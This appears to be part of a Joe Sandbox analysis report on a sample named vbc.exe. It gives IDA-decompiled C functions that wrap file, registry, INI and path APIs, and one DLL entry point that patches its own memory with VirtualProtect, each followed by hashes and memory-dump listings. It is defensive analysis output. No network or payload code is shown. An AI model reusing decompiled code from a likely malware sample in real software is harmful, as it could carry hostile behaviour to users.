                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryErrorLast
                                                • String ID:
                                                • API String ID: 1375471231-0
                                                • Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                • Instruction ID: 9103f4137618f2f7179a3cd735c3beaeb677db9e9f97e60de6da32ac40298118
                                                • Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                • Instruction Fuzzy Hash: 42C04C31204A019BD6506B209F08B177A94EF50742F21C4396646F00A0DA348425DF3D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 70%
                                                			E0040167B() {
                                                				int _t7;
                                                				void* _t13;
                                                				void* _t15;
                                                				void* _t20;
                                                
                                                				_t18 = E00402C53(0xffffffd0);
                                                				_t16 = E00402C53(0xffffffdf);
                                                				E00402C53(0x13);
                                                				_t7 = MoveFileW(_t4, _t5); // executed
                                                				if(_t7 == 0) {
                                                					if( *((intOrPtr*)(_t20 - 0x20)) == _t13 || E00406555(_t18) == 0) {
                                                						 *((intOrPtr*)(_t20 - 4)) = 1;
                                                					} else {
                                                						E004060B3(_t15, _t18, _t16);
                                                						_push(0xffffffe4);
                                                						goto L5;
                                                					}
                                                				} else {
                                                					_push(0xffffffe3);
                                                					L5:
                                                					E00401423();
                                                				}
                                                				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t20 - 4));
                                                				return 0;
                                                			}







                                                0x00401684
                                                0x0040168d
                                                0x0040168f
                                                0x00401696
                                                0x0040169e
                                                0x004016aa
                                                0x004028a1
                                                0x004016be
                                                0x004016c0
                                                0x004016c5
                                                0x00000000
                                                0x004016c5
                                                0x004016a0
                                                0x004016a0
                                                0x0040224b
                                                0x0040224b
                                                0x0040224b
                                                0x00402ade
                                                0x00402aea

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FileMove
                                                • String ID:
                                                • API String ID: 3562171763-0
                                                • Opcode ID: 8100d13256f8e2fae07f806f013d39e4d98fcf22fcf79b25ba5aed942edfd508
                                                • Instruction ID: 60e635295c4898b6971f0d6b86fcc4365428ea47b068a52fddb524a00f4394d8
                                                • Opcode Fuzzy Hash: 8100d13256f8e2fae07f806f013d39e4d98fcf22fcf79b25ba5aed942edfd508
                                                • Instruction Fuzzy Hash: 76F0BB31608524A7DB10B7B59F4DD9E2154AF4236CB21837FF512B21D0DABDC542457F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 33%
                                                			E00402805(intOrPtr __edx, void* __eflags) {
                                                				long _t8;
                                                				long _t10;
                                                				LONG* _t12;
                                                				void* _t14;
                                                				intOrPtr _t15;
                                                				void* _t17;
                                                				void* _t19;
                                                
                                                				_t15 = __edx;
                                                				_push(ds);
                                                				if(__eflags != 0) {
                                                					_t8 = E00402C31(2);
                                                					_pop(_t14);
                                                					 *((intOrPtr*)(_t19 - 0x50)) = _t15;
                                                					_t10 = SetFilePointer(E00406172(_t14, _t17), _t8, _t12,  *(_t19 - 0x1c)); // executed
                                                					if( *((intOrPtr*)(_t19 - 0x24)) >= _t12) {
                                                						_push(_t10);
                                                						_push( *((intOrPtr*)(_t19 - 0xc)));
                                                						E00406159();
                                                					}
                                                				}
                                                				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t19 - 4));
                                                				return 0;
                                                			}










                                                0x00402805
                                                0x00402805
                                                0x00402806
                                                0x0040280e
                                                0x00402813
                                                0x00402814
                                                0x00402823
                                                0x0040282c
                                                0x00402a7d
                                                0x00402a7e
                                                0x00402a81
                                                0x00402a81
                                                0x0040282c
                                                0x00402ade
                                                0x00402aea

                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402823
                                                  • Part of subcall function 00406159: wsprintfW.USER32 ref: 00406166
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FilePointerwsprintf
                                                • String ID:
                                                • API String ID: 327478801-0
                                                • Opcode ID: 5f1d525169d9ce6b4f9467462e39e8872e382c374fce7961deb580ad00958b0a
                                                • Instruction ID: 360c63f9489f710495f37cc3b83494bffb267c36335a31cc71ff2527b59642b3
                                                • Opcode Fuzzy Hash: 5f1d525169d9ce6b4f9467462e39e8872e382c374fce7961deb580ad00958b0a
                                                • Instruction Fuzzy Hash: 18E06571A00104EBD711DBA4AE45CAE7379DF00308711883BF102B40D1CAB94D529A2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040230C(int __eax, WCHAR* __ebx) {
                                                				WCHAR* _t11;
                                                				WCHAR* _t13;
                                                				void* _t17;
                                                				int _t21;
                                                
                                                				_t11 = __ebx;
                                                				_t5 = __eax;
                                                				_t13 = 0;
                                                				if(__eax != __ebx) {
                                                					__eax = E00402C53(__ebx);
                                                				}
                                                				if( *((intOrPtr*)(_t17 - 0x24)) != _t11) {
                                                					_t13 = E00402C53(0x11);
                                                				}
                                                				if( *((intOrPtr*)(_t17 - 0x18)) != _t11) {
                                                					_t11 = E00402C53(0x22);
                                                				}
                                                				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402C53(0xffffffcd)); // executed
                                                				_t21 = _t5;
                                                				if(_t21 == 0) {
                                                					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                				}
                                                				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t17 - 4));
                                                				return 0;
                                                			}







                                                0x0040230c
                                                0x0040230c
                                                0x0040230e
                                                0x00402312
                                                0x00402315
                                                0x0040231a
                                                0x0040231f
                                                0x00402328
                                                0x00402328
                                                0x0040232d
                                                0x00402336
                                                0x00402336
                                                0x00402343
                                                0x004015b4
                                                0x004015b6
                                                0x004028a1
                                                0x004028a1
                                                0x00402ade
                                                0x00402aea

                                                APIs
                                                • WritePrivateProfileStringW.KERNEL32 ref: 00402343
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringWrite
                                                • String ID:
                                                • API String ID: 390214022-0
                                                • Opcode ID: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
                                                • Instruction ID: 442d6135041436e14d88d5d309934ead45877352a2168de0e76fd2d1165917bb
                                                • Opcode Fuzzy Hash: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
                                                • Instruction Fuzzy Hash: 3FE086319085B66BE71036F10F8DABF10589B44385B14057FB612B71C3D9FC4D8242AD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00401735() {
                                                				long _t5;
                                                				WCHAR* _t8;
                                                				WCHAR* _t12;
                                                				void* _t14;
                                                				long _t17;
                                                
                                                				_t5 = SearchPathW(_t8, E00402C53(0xffffffff), _t8, 0x400, _t12, _t14 + 8); // executed
                                                				_t17 = _t5;
                                                				if(_t17 == 0) {
                                                					 *((intOrPtr*)(_t14 - 4)) = 1;
                                                					 *_t12 = _t8;
                                                				}
                                                				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t14 - 4));
                                                				return 0;
                                                			}








                                                0x00401749
                                                0x0040174f
                                                0x00401751
                                                0x0040286f
                                                0x00402876
                                                0x00402876
                                                0x00402ade
                                                0x00402aea

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: PathSearch
                                                • String ID:
                                                • API String ID: 2203818243-0
                                                • Opcode ID: a1234d6e155c05a9ccd005b46901709963593e7fcb96b3c3db0381c47e23972b
                                                • Instruction ID: d8de68dbe72b960966570827fcf7b95eaea009d5ef273339483d93543a2671c7
                                                • Opcode Fuzzy Hash: a1234d6e155c05a9ccd005b46901709963593e7fcb96b3c3db0381c47e23972b
                                                • Instruction Fuzzy Hash: 9BE0D872300100ABD710DB64DE48AAA3398DF0036CF20853AE602A60C0D6B48A41873D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E00402D5D(void* __eflags, void* _a4) {
                                                				short* _t8;
                                                				intOrPtr _t9;
                                                				signed int _t11;
                                                
                                                				_t8 = E00402C53(0x22);
                                                				_t9 =  *0x40cdd8; // 0x18e8c8
                                                				_t11 = RegOpenKeyExW(E00402D48( *((intOrPtr*)(_t9 + 4))), _t8, 0,  *0x42a2f0 | _a4,  &_a4); // executed
                                                				asm("sbb eax, eax");
                                                				return  !( ~_t11) & _a4;
                                                			}






                                                0x00402d71
                                                0x00402d77
                                                0x00402d85
                                                0x00402d8d
                                                0x00402d95

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
                                                • Instruction ID: 508f16f0b04c5eadc0d806ad76faca1178dd72643dd16b9b94500f6ee76514f5
                                                • Opcode Fuzzy Hash: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
                                                • Instruction Fuzzy Hash: 12E04F76280108ABDB00EFA4EE46ED537DCAB14740F008021B608D70A1C674E5509768
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405E6A(void* _a4, void* _a8, long _a12) {
                                                				int _t7;
                                                				long _t11;
                                                
                                                				_t11 = _a12;
                                                				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                				if(_t7 == 0 || _t11 != _a12) {
                                                					return 0;
                                                				} else {
                                                					return 1;
                                                				}
                                                			}





                                                0x00405e6e
                                                0x00405e7e
                                                0x00405e86
                                                0x00000000
                                                0x00405e8d
                                                0x00000000
                                                0x00405e8f

                                                APIs
                                                • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000), ref: 00405E7E
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                • Instruction ID: 5673304fef1064f236b213ef723108cd0aff19b739320a24e8caa41491261f20
                                                • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                • Instruction Fuzzy Hash: 27E0B63661025ABBDF109F65DC00AAB7B6CFB05260F048436BA55E6190E635E9219AE4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405E99(void* _a4, void* _a8, long _a12) {
                                                				int _t7;
                                                				long _t11;
                                                
                                                				_t11 = _a12;
                                                				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                				if(_t7 == 0 || _t11 != _a12) {
                                                					return 0;
                                                				} else {
                                                					return 1;
                                                				}
                                                			}





                                                0x00405e9d
                                                0x00405ead
                                                0x00405eb5
                                                0x00000000
                                                0x00405ebc
                                                0x00000000
                                                0x00405ebe

                                                APIs
                                                • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000), ref: 00405EAD
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                • Instruction ID: 98d10028cd881ca52753e47c7ca342dd4640a312c7922d7b1eeb81aac27e7924
                                                • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                • Instruction Fuzzy Hash: 41E0EC3226065AABDF109F55DC00EEB7F6CEB053A1F048836FD55E2190D631EA62DBE4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                
                                                				 *0x10004048 = _a4;
                                                				if(_a8 == 1) {
                                                					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
                                                					 *0x1000405c = 0xc2;
                                                					 *0x1000404c = 0;
                                                					 *0x10004054 = 0;
                                                					 *0x10004068 = 0;
                                                					 *0x10004058 = 0;
                                                					 *0x10004050 = 0;
                                                					 *0x10004060 = 0;
                                                					 *0x1000405e = 0;
                                                				}
                                                				return 1;
                                                			}



                                                0x100027d0
                                                0x100027d5
                                                0x100027e5
                                                0x100027ed
                                                0x100027f4
                                                0x100027f9
                                                0x100027fe
                                                0x10002803
                                                0x10002808
                                                0x1000280d
                                                0x10002812
                                                0x10002812
                                                0x1000281a

                                                APIs
                                                • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1187096377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.1187091951.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.1187101005.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.1187106210.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_vbc.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040234E(short __ebx) {
                                                				short _t7;
                                                				WCHAR* _t8;
                                                				WCHAR* _t19;
                                                				void* _t21;
                                                				void* _t24;
                                                
                                                				_t7 =  *0x40a010; // 0xa
                                                				 *(_t21 + 8) = _t7;
                                                				_t8 = E00402C53(1);
                                                				 *(_t21 - 0x50) = E00402C53(0x12);
                                                				GetPrivateProfileStringW(_t8,  *(_t21 - 0x50), _t21 + 8, _t19, 0x3ff, E00402C53(0xffffffdd)); // executed
                                                				_t24 =  *_t19 - 0xa;
                                                				if(_t24 == 0) {
                                                					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                					 *_t19 = __ebx;
                                                				}
                                                				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t21 - 4));
                                                				return 0;
                                                			}








                                                0x0040234e
                                                0x00402355
                                                0x00402358
                                                0x00402368
                                                0x0040237f
                                                0x00402385
                                                0x00401751
                                                0x0040286f
                                                0x00402876
                                                0x00402876
                                                0x00402ade
                                                0x00402aea

                                                APIs
                                                • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: PrivateProfileString
                                                • String ID:
                                                • API String ID: 1096422788-0
                                                • Opcode ID: a0c645cdae85ff89f3910aa28bd6119042b2c01797eb2224224bfadf122582d4
                                                • Instruction ID: dd75bc0ae23c3a1c44a4da6173f6571f456224c800c03a06d022cc4bf2e9b606
                                                • Opcode Fuzzy Hash: a0c645cdae85ff89f3910aa28bd6119042b2c01797eb2224224bfadf122582d4
                                                • Instruction Fuzzy Hash: C2E04F30804259AAEB00BFE0DE09AED3B68AF00384F10443AF640AB0D1E7F8C5829749
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004015A3() {
                                                				int _t5;
                                                				void* _t11;
                                                				int _t14;
                                                
                                                				_t5 = SetFileAttributesW(E00402C53(0xfffffff0),  *(_t11 - 0x24)); // executed
                                                				_t14 = _t5;
                                                				if(_t14 == 0) {
                                                					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                				}
                                                				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t11 - 4));
                                                				return 0;
                                                			}






                                                0x004015ae
                                                0x004015b4
                                                0x004015b6
                                                0x004028a1
                                                0x004028a1
                                                0x00402ade
                                                0x00402aea

                                                APIs
                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 9ff7721e1f69ebac7603c38c99d10499fff0838f18fff7d5bc70e8c3971da3d6
                                                • Instruction ID: c23ad3d9d814670b9e5664e680d4ed6fd6c27bb1f69e79231988cb8a8a550e85
                                                • Opcode Fuzzy Hash: 9ff7721e1f69ebac7603c38c99d10499fff0838f18fff7d5bc70e8c3971da3d6
                                                • Instruction Fuzzy Hash: CCD01232704104D7DB10DBA4AB4869D73A1EB40369B218577D602F21D0D6B9CA919B29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004014F5() {
                                                				void* _t9;
                                                
                                                				SetForegroundWindow( *(_t9 - 8)); // executed
                                                				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t9 - 4));
                                                				return 0;
                                                			}




                                                0x004014f8
                                                0x00402ade
                                                0x00402aea

                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?), ref: 004014F8
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
